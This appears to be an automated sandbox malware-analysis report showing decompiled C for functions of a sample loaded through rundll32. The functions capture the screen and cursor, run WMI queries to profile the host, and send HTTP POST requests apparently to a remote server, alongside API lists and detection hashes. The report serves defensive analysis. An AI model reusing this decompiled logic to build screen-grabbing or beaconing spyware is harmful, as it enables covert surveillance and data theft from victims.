            • GetCursorInfo.USER32(?), ref: 03465DC3
            • CopyIcon.USER32 ref: 03465DD8
            • GetIconInfo.USER32(00000000,?), ref: 03465DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 03465E04
            • DrawIconEx.USER32 ref: 03465E1C
            • SelectObject.GDI32(00000000,?), ref: 03465E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 03465E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 03465EBF
            • DeleteDC.GDI32(00000000), ref: 03465F70
            • DeleteDC.GDI32(00000000), ref: 03465F7B
            • DeleteObject.GDI32(00000000), ref: 03465F86
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 4d272a90f821c4978cbc60c2ea9a42f42be5351f2a5e7822306182726406c081
            • Instruction ID: 2af9a0e9278a80cb16c01daaec5cdd4bfa18d3cd8291d732d8147f96f16ee51e
            • Opcode Fuzzy Hash: 4d272a90f821c4978cbc60c2ea9a42f42be5351f2a5e7822306182726406c081
            • Instruction Fuzzy Hash: 95811A75D00219AFDB24DFA5DC49BAEBBB8FF49700F14406AE505FB244EB309A05CB65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346EACA Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0346EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0346E485(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E03468DC9(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E03468DDF( &_v60, 0xfffffffe);
					E0346E539( &_v104);
					return _t320;
				}
				_t165 = E03469F85(_t255, 0xcdd);
				 *_t328 = 0x6b4;
				_v52 = _t165;
				_t166 = E03469F85(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E03469C50(_t165);
				_v60 = _t322;
				E03468D9A( &_v52);
				E03468D9A( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E03469F85(_t255, 0xc93);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E03468D9A( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E03468DDF( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E03469AB3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E03469AB3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E03468E5D(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E03468DC9( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E03468DDF(_t136, 0);
								E03468DDF( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E03469AB3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E03469F85(_t281, 0xcc1);
								 *_t329 = 0xabe;
								_t217 = E03469F85(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03468DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E03468D9A( &_v92);
											E03468D9A( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E03469FE4();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E03468DC9(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E03469F85(_t283, 0x2a);
										E03469FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E03468D9A( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E03469AB3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0346E9AE( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E03468DDF( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































            0x0346ead3
            0x0346ead9
            0x0346eae0
            0x0346eae3
            0x0346eae6
            0x0346eaeb
            0x0346eaed
            0x0346eaf2
            0x0346ef37
            0x0346ef37
            0x0346eaff
            0x0346eb01
            0x0346eb04
            0x0346eb07
            0x0346ef1c
            0x0346ef22
            0x0346ef2c
            0x00000000
            0x0346ef31
            0x0346eb12
            0x0346eb19
            0x0346eb20
            0x0346eb23
            0x0346eb28
            0x0346eb2a
            0x0346eb2d
            0x0346eb30
            0x0346eb31
            0x0346eb3a
            0x0346eb40
            0x0346eb43
            0x0346eb4c
            0x0346eb51
            0x0346eb56
            0x0346eb6d
            0x0346eb7a
            0x0346eb7d
            0x0346eb84
            0x0346eb89
            0x0346eb90
            0x0346eb95
            0x0346eb9c
            0x0346eb9e
            0x0346ebaa
            0x0346ebad
            0x0346ebaf
            0x0346ef0c
            0x0346ef0d
            0x0346ef16
            0x00000000
            0x0346ef16
            0x0346ebb5
            0x0346ebb8
            0x0346ebbb
            0x0346ebbe
            0x0346ebc0
            0x0346eed8
            0x0346eedb
            0x0346eede
            0x0346eee0
            0x0346ef02
            0x0346ef07
            0x0346eee2
            0x0346eee5
            0x0346eef0
            0x0346eef7
            0x0346eef7
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346ebc6
            0x0346ebc6
            0x0346ebd8
            0x0346ebdb
            0x0346ebdd
            0x00000000
            0x00000000
            0x0346ebe5
            0x0346ebe8
            0x0346ebeb
            0x0346ebee
            0x0346ebf1
            0x0346ebf4
            0x00000000
            0x00000000
            0x0346ebfa
            0x0346ec08
            0x0346ec0b
            0x0346ec0d
            0x0346ec26
            0x0346ec35
            0x0346ec3d
            0x0346ec3d
            0x0346ec40
            0x0346ec47
            0x0346ec4b
            0x0346ec51
            0x0346ec53
            0x0346eec0
            0x0346eec6
            0x0346eecc
            0x0346eecf
            0x0346eecf
            0x00000000
            0x0346eecf
            0x0346ec62
            0x0346ec76
            0x0346ec7a
            0x0346ec7c
            0x0346ec81
            0x0346ee8d
            0x0346ee93
            0x0346ee9e
            0x0346eea9
            0x0346eeaf
            0x0346eeb5
            0x0346eeb8
            0x00000000
            0x0346eeb8
            0x0346ec87
            0x0346ee5b
            0x0346ee5b
            0x0346ee5e
            0x0346ee61
            0x00000000
            0x00000000
            0x0346ec8f
            0x0346ec97
            0x0346ec9e
            0x0346eca4
            0x0346eca6
            0x00000000
            0x00000000
            0x0346ecaf
            0x0346ecc4
            0x0346ecca
            0x0346ecd3
            0x0346ecd6
            0x0346ecd9
            0x0346ecdb
            0x0346ee4e
            0x0346ee51
            0x0346ee5a
            0x0346ee5a
            0x00000000
            0x0346ee5a
            0x0346eceb
            0x0346ecee
            0x0346ecf5
            0x0346ecfb
            0x0346ecfe
            0x0346ed01
            0x0346ed04
            0x0346ed07
            0x0346ed43
            0x0346ed43
            0x0346ed46
            0x0346edef
            0x0346ee03
            0x0346ee13
            0x0346ee17
            0x0346ee19
            0x0346ee30
            0x0346ee34
            0x0346ee3d
            0x0346ee48
            0x00000000
            0x0346ee48
            0x0346ee1f
            0x0346ee20
            0x0346ee25
            0x0346ee25
            0x0346ee27
            0x0346ee28
            0x0346ee2d
            0x00000000
            0x0346ee2d
            0x0346ed4c
            0x0346ed4c
            0x0346ed4f
            0x0346edb7
            0x0346edcb
            0x0346eddb
            0x0346eddf
            0x0346ede1
            0x00000000
            0x00000000
            0x0346ede7
            0x0346ede8
            0x00000000
            0x0346ede8
            0x0346ed51
            0x0346ed51
            0x0346ed54
            0x00000000
            0x00000000
            0x0346ed56
            0x0346ed59
            0x00000000
            0x00000000
            0x0346ed5b
            0x0346ed5b
            0x0346ed61
            0x0346ed7a
            0x0346ed89
            0x0346ed92
            0x0346ed97
            0x0346ed9a
            0x0346eda0
            0x0346eda0
            0x0346eda5
            0x0346edb1
            0x00000000
            0x0346edb1
            0x0346ed66
            0x00000000
            0x0346ed66
            0x0346ed09
            0x0346ed30
            0x0346ed35
            0x0346ed3a
            0x0346ed3c
            0x0346ed3c
            0x00000000
            0x0346ed3a
            0x0346ed0b
            0x0346ed0b
            0x0346ed0e
            0x00000000
            0x00000000
            0x0346ed14
            0x0346ed14
            0x0346ed17
            0x00000000
            0x00000000
            0x0346ed1d
            0x0346ed1d
            0x0346ed20
            0x00000000
            0x00000000
            0x0346ed26
            0x0346ed29
            0x00000000
            0x00000000
            0x0346ed2b
            0x00000000
            0x0346ed2b
            0x0346ee6a
            0x0346ee70
            0x0346ee76
            0x0346ee79
            0x0346ee7c
            0x0346ee7c
            0x0346ee7f
            0x0346ee80
            0x0346ee83
            0x0346ee85
            0x00000000
            0x00000000
            0x0346eed5
            0x0346eed5
            0x00000000
            0x0346eed5
            0x0346ec0f
            0x0346ec15
            0x00000000
            0x0346ec15
            0x0346eed2
            0x00000000
            0x0346eb58
            0x0346eb5d
            0x0346eb62
            0x00000000
            0x0346eb66

            APIs
              • Part of subcall function 0346E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E498
              • Part of subcall function 0346E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4A9
              • Part of subcall function 0346E485: CoCreateInstance.OLE32(0347C8A0,00000000,00000001,0347C8B0,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4C0
              • Part of subcall function 0346E485: SysAllocString.OLEAUT32(00000000), ref: 0346E4CB
              • Part of subcall function 0346E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4F6
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0346EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0346EB87
            • SysFreeString.OLEAUT32(?), ref: 0346EF0D
            • SysFreeString.OLEAUT32(?), ref: 0346EF16
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: cd42b6efefc8660a8932cf39d3edf5ac6dc2ea07fb83eadadd1515428501d05f
            • Instruction ID: 21778e6771821af30d9c45b09774d95227958918ec0c8e9432a4ad2bf4a72c8d
            • Opcode Fuzzy Hash: cd42b6efefc8660a8932cf39d3edf5ac6dc2ea07fb83eadadd1515428501d05f
            • Instruction Fuzzy Hash: 87E17B7AE00219AFCB14EFA4C984AEEBBF9FF48300F14445EE515AF285DB70A941CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03472951 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E03472951(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E034728AC( &_v16);
				return 0;
			}











            0x03472957
            0x03472969
            0x0347296d
            0x034729e1
            0x00000000
            0x034729e3
            0x0347297d
            0x03472981
            0x00000000
            0x00000000
            0x03472989
            0x0347298b
            0x03472990
            0x00000000
            0x00000000
            0x0347299a
            0x0347299e
            0x00000000
            0x00000000
            0x034729a0
            0x034729a5
            0x034729a7
            0x034729a9
            0x034729ae
            0x034729b3
            0x00000000
            0x00000000
            0x034729be
            0x034729c8
            0x034729cc
            0x00000000
            0x00000000
            0x034729db
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,03467C84), ref: 03472963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0347297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 03472989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 03472998
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: da6b276536d554812c327959688ce467fe0811ac184c80ea5f37be49752bd606
            • Instruction ID: 8f0dda32d9b8950f0c45cd5803ce4292e3bcd5a0ecf76269d3497bc20e17f516
            • Opcode Fuzzy Hash: da6b276536d554812c327959688ce467fe0811ac184c80ea5f37be49752bd606
            • Instruction Fuzzy Hash: A911A977F44319BBDB51E6B58C42FDFB6AC9F44650F290562EA00FA240DBB0DE008A58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346F7A3 Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 268COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0346F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				int _v68;
				void* _v72;
				intOrPtr _v92;
				int _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char* _v112;
				char _v116;
				char _v132;
				void _v388;
				void _v644;
				intOrPtr _t94;
				intOrPtr _t102;
				signed int _t104;
				intOrPtr* _t105;
				intOrPtr _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t115;
				signed int _t116;
				char _t117;
				intOrPtr _t119;
				char _t122;
				intOrPtr _t127;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t139;
				intOrPtr _t143;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				void* _t163;
				signed int _t165;
				void* _t166;
				intOrPtr _t179;
				signed int _t186;
				char _t188;
				signed int _t189;
				void* _t190;
				char _t193;
				signed int _t194;
				signed int _t195;
				void* _t196;

				_v24 = 4;
				_v32 = 0;
				_v28 = 1;
				_t190 = __edx;
				memset( &_v388, 0, 0x100);
				memset( &_v644, 0, 0x100);
				_t166 = 0x65;
				_v56 = E03469F6B(_t166);
				_v52 = E03469F6B(0xcc6);
				_v48 = E03469F6B(0xe03);
				_v44 = E03469F6B(0x64c);
				_t94 = E03469F6B(0x80a);
				_v36 = _v36 & 0;
				_t188 = 0x3c;
				_v40 = _t94;
				E03468F63( &_v116, 0, 0x100);
				_v108 = 0x10;
				_v112 =  &_v132;
				_v116 = _t188;
				_v100 =  &_v388;
				_v96 = 0x100;
				_v72 =  &_v644;
				_push( &_v116);
				_push(0);
				_v68 = 0x100;
				_push(E0346A5D0(_t190));
				_t102 =  *0x347f8f0; // 0x0
				_push(_t190);
				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
					_t104 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t105 =  *0x347f8f0; // 0x0
						_v8 = 0x8404f700;
						_t189 =  *_t105( *0x347f9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
						__eflags = _t189;
						if(_t189 != 0) {
							E0346F73B(_t189);
							_t110 =  *0x347f8f0; // 0x0
							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t165 = _t111;
							if(_a24 != 0) {
								E0346A1F8(_a24);
							}
							__eflags = _t165;
							if(_t165 != 0) {
								__eflags = _v104 - 4;
								_t112 = 0x8484f700;
								if(_v104 != 4) {
									_t112 = _v8;
								}
								_t115 =  *0x347f8f0; // 0x0
								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
								_v8 = _t116;
								__eflags = _a24;
								if(_a24 != 0) {
									E0346A1F8(_a24);
									_t116 = _v8;
								}
								__eflags = _t116;
								if(_t116 != 0) {
									__eflags = _v104 - 4;
									if(_v104 == 4) {
										E0346F6E9(_t116);
									}
									_t117 = E03469F6B(0x82e);
									_t193 = _t117;
									_v16 = _t193;
									_t119 =  *0x347f8f0; // 0x0
									_t194 = _v8;
									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0346A5D0(_t193), _a4, _a8);
									E03468D87( &_v16);
									__eflags = _a24;
									if(_a24 != 0) {
										E0346A1F8(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L25:
										_t122 = 8;
										_v24 = _t122;
										_v20 = 0;
										_v16 = 0;
										E03468F63( &_v20, 0, _t122);
										_t127 =  *0x347f8f0; // 0x0
										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
										if(__eflags != 0) {
											_t129 = E0346A102( &_v20, __eflags);
											__eflags = _t129 - 0xc8;
											if(_t129 == 0xc8) {
												 *_a20 = _t194;
												 *_a12 = _t189;
												 *_a16 = _t165;
												__eflags = 0;
												return 0;
											}
											_v12 =  ~_t129;
											L29:
											_t135 =  *0x347f8f0; // 0x0
											 *((intOrPtr*)(_t135 + 8))(_t194);
											_t195 = _v12;
											L30:
											__eflags = _t165;
											if(_t165 != 0) {
												_t139 =  *0x347f8f0; // 0x0
												 *((intOrPtr*)(_t139 + 8))(_t165);
											}
											__eflags = _t189;
											if(_t189 != 0) {
												_t179 =  *0x347f8f0; // 0x0
												 *((intOrPtr*)(_t179 + 8))(_t189);
											}
											return _t195;
										}
										GetLastError();
										_v12 = 0xfffffff8;
										goto L29;
									} else {
										GetLastError();
										_t143 =  *0x347f8f0; // 0x0
										 *((intOrPtr*)(_t143 + 8))(_t194);
										_t145 =  *0x347f8f0; // 0x0
										_v8 = _v8 & 0x00000000;
										 *((intOrPtr*)(_t145 + 8))(_t165);
										_t147 =  *0x347f8f0; // 0x0
										_t165 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t147 + 8))(_t189);
										_t194 = _v8;
										goto L21;
									}
								} else {
									GetLastError();
									_t153 =  *0x347f8f0; // 0x0
									 *((intOrPtr*)(_t153 + 8))(_t165);
									_t155 =  *0x347f8f0; // 0x0
									_t165 = 0;
									 *((intOrPtr*)(_t155 + 8))(_t189);
									_t189 = 0;
									_t194 = _v8;
									goto L22;
								}
							} else {
								GetLastError();
								_t159 =  *0x347f8f0; // 0x0
								 *((intOrPtr*)(_t159 + 8))(_t189);
								L21:
								_t189 = 0;
								__eflags = 0;
								goto L22;
							}
						}
						GetLastError();
						L22:
						_t186 = _t194;
						_t104 = _v12 + 1;
						_v12 = _t104;
						__eflags = _t104 - 2;
					} while (_t104 < 2);
					__eflags = _t186;
					if(_t186 != 0) {
						goto L25;
					}
					_t195 = 0xfffffffe;
					goto L30;
				}
				_t163 = 0xfffffffc;
				return _t163;
			}






























































            0x0346f7b1
            0x0346f7bd
            0x0346f7c4
            0x0346f7d1
            0x0346f7d4
            0x0346f7e5
            0x0346f7ef
            0x0346f7fa
            0x0346f807
            0x0346f814
            0x0346f821
            0x0346f824
            0x0346f829
            0x0346f82e
            0x0346f830
            0x0346f838
            0x0346f840
            0x0346f847
            0x0346f853
            0x0346f856
            0x0346f864
            0x0346f867
            0x0346f86d
            0x0346f86e
            0x0346f870
            0x0346f879
            0x0346f87a
            0x0346f87f
            0x0346f885
            0x0346f88f
            0x0346f88f
            0x0346f891
            0x0346f896
            0x0346f8a0
            0x0346f8ab
            0x0346f8b4
            0x0346f8b6
            0x0346f8b8
            0x0346f8c7
            0x0346f8de
            0x0346f8e4
            0x0346f8e7
            0x0346f8eb
            0x0346f8ed
            0x0346f8f2
            0x0346f8f2
            0x0346f8f7
            0x0346f8f9
            0x0346f90f
            0x0346f913
            0x0346f918
            0x0346f91a
            0x0346f91a
            0x0346f92e
            0x0346f939
            0x0346f93c
            0x0346f93f
            0x0346f942
            0x0346f947
            0x0346f94c
            0x0346f94c
            0x0346f94f
            0x0346f951
            0x0346f977
            0x0346f97b
            0x0346f97f
            0x0346f97f
            0x0346f989
            0x0346f991
            0x0346f996
            0x0346f9a1
            0x0346f9a7
            0x0346f9b1
            0x0346f9b4
            0x0346f9b9
            0x0346f9bd
            0x0346f9c2
            0x0346f9c2
            0x0346f9c7
            0x0346f9cb
            0x0346fa16
            0x0346fa18
            0x0346fa1b
            0x0346fa23
            0x0346fa27
            0x0346fa2a
            0x0346fa3c
            0x0346fa47
            0x0346fa49
            0x0346fa5d
            0x0346fa62
            0x0346fa67
            0x0346fa9c
            0x0346faa1
            0x0346faa6
            0x0346faa8
            0x00000000
            0x0346faa8
            0x0346fa6b
            0x0346fa6e
            0x0346fa6e
            0x0346fa74
            0x0346fa77
            0x0346fa7a
            0x0346fa7a
            0x0346fa7c
            0x0346fa7e
            0x0346fa84
            0x0346fa84
            0x0346fa87
            0x0346fa89
            0x0346fa8b
            0x0346fa92
            0x0346fa92
            0x00000000
            0x0346fa95
            0x0346fa4b
            0x0346fa51
            0x00000000
            0x0346f9cd
            0x0346f9cd
            0x0346f9d3
            0x0346f9d9
            0x0346f9dc
            0x0346f9e1
            0x0346f9e6
            0x0346f9e9
            0x0346f9ee
            0x0346f9ee
            0x0346f9f1
            0x0346f9f4
            0x00000000
            0x0346f9f4
            0x0346f953
            0x0346f953
            0x0346f959
            0x0346f95f
            0x0346f962
            0x0346f967
            0x0346f96a
            0x0346f96d
            0x0346f96f
            0x00000000
            0x0346f96f
            0x0346f8fb
            0x0346f8fb
            0x0346f901
            0x0346f907
            0x0346f9f7
            0x0346f9f7
            0x0346f9f7
            0x00000000
            0x0346f9f7
            0x0346f8f9
            0x0346f8ba
            0x0346f9f9
            0x0346f9fc
            0x0346f9fe
            0x0346fa01
            0x0346fa04
            0x0346fa04
